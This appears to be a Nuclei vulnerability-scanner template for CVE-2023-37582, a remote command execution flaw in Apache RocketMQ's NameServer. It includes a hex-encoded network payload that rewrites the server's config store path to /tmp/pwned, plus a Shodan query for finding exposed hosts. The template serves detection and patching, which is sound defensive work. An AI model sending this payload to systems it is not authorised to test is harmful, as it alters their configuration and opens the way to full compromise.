id: CVE-2023-37582

info:
  name: Apache RocketMQ - Remote Command Execution
  author: daffainfo
  severity: critical
  description: |
    The RocketMQ NameServer component still has a remote command execution vulnerability because the CVE-2023-33246 issue was not completely fixed in version 5.1.1. When NameServer addresses are exposed on the extranet and lack permission verification, an attacker can exploit this vulnerability by using the update configuration function on the NameServer component to execute commands as the system user that RocketMQ is running as. It is recommended that users upgrade their NameServer version to 5.1.2 or above for RocketMQ 5.x, or 4.9.7 or above for RocketMQ 4.x, to prevent these attacks.
  impact: |
    Attackers can execute arbitrary commands on the system, potentially leading to full system compromise.
  remediation: |
    Upgrade RocketMQ to version 5.1.2 or above for the 5.x series, or 4.9.7 or above for the 4.x series.
  reference:
    - http://www.openwall.com/lists/oss-security/2023/07/12/1
    - https://lists.apache.org/thread/m614czxtpvlztd7mfgcs2xcsg36rdbnc
    - https://github.com/Malayke/CVE-2023-37582_EXPLOIT
    - https://nvd.nist.gov/vuln/detail/CVE-2023-37582
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2023-37582
    cwe-id: CWE-94
    epss-score: 0.90036
    epss-percentile: 0.99778
    cpe: cpe:2.3:a:apache:rocketmq:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: apache
    product: rocketmq
    shodan-query: rocketmq port:"9876"
  tags: cve,cve2023,apache,rocketmq,network,intrusive,vkev,vuln

tcp:
  - inputs:
      - data: 000000a4000000617b22636f6465223a3331382c22666c6167223a302c226c616e6775616765223a224a415641222c226f7061717565223a302c2273657269616c697a655479706543757272656e74525043223a224a534f4e222c2276657273696f6e223a3430357d636f6e66696753746f7265506174683d2f746d702f70776e65640a70726f64756374456e764e616d653d746573742f706174685c6e746573745c6e74657374
        type: hex

    host:
      - "{{Hostname}}"
    port: 9876
    read-size: 1024

    matchers:
      - type: dsl
        dsl:
          - 'contains_all(raw, "serializeTypeCurrentRPC", "version", "code\":0")'
          - "!contains_any(raw, 'Can not update config','FORBID ACCESS')"
        condition: and
# digest: 490a00463044022065e20a2ad9a5a659a7e7080c377271825377f8db4ed0840fad801e47cba1d95d02203ccb776681e4a966615965e82db58de42976918ff6ab1031b6b518dc3e6d79ae:922c64590222798bb761d5b6d8e72950